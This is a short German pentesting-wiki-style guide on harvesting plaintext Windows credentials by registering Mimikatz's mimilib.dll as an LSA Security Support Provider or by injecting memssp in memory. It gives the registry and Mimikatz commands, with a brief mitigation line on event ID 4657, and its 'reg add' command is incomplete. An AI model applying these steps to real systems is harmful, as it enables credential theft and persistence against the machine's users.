Benutzerdefinierte SSP

Erfahren Sie hier, was ein SSP (Security Support Provider) ist. Sie können Ihren eigenen SSP erstellen, um die zum Zugriff auf die Maschine verwendeten Anmeldeinformationen im Klartext zu erfassen.

Mimilib

Sie können die von Mimikatz bereitgestellte Binärdatei mimilib.dll verwenden. Dies protokolliert alle Anmeldeinformationen im Klartext in einer Datei. Legen Sie die DLL in C:\Windows\System32\ ab. Erhalten Sie eine Liste der vorhandenen LSA-Sicherheitspakete:

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

Fügen Sie mimilib.dll zur Liste der Sicherheitsunterstützungsanbieter (Security Packages) hinzu:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

Und nach einem Neustart können alle Anmeldeinformationen im Klartext in C:\Windows\System32\kiwissp.log gefunden werden.

Im Speicher

Sie können dies auch direkt im Speicher injizieren, indem Sie Mimikatz verwenden (beachten Sie, dass dies möglicherweise etwas instabil/nicht funktionierend ist):

privilege::debug
misc::memssp

Dies überlebt keine Neustarts.

Abhilfe

Ereignis-ID 4657 - Überwachung der Erstellung/Änderung von HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages